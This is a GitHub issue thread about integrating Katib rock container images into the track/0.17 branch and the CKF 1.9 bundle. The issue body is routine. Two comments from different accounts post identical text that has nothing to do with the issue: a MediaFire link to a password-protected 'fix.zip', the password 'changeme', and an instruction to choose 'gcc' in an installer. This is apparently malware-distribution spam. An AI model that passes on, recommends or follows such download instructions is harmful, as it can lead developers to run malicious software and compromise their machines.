### ISSUE TITLE
Integrate the Katib rocks for CKF 1.9

### ISSUE THREAD

**Issue by kimwnasptd** [canonical/katib-operators#232]
### Context

We haven now rocks being built/published for almost all of the Katib images
- https://github.com/canonical/katib-rocks/pull/44
- https://github.com/canonical/katib-rocks/pull/46

The last pending rock is in https://github.com/canonical/katib-rocks/pull/45

### What needs to get done

1. Integrate the rocks in `track/0.17`
2. Publish to stable

### Definition of Done

The Katib rocks in the above mentioned PRs are used in the 1.9 bundle

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
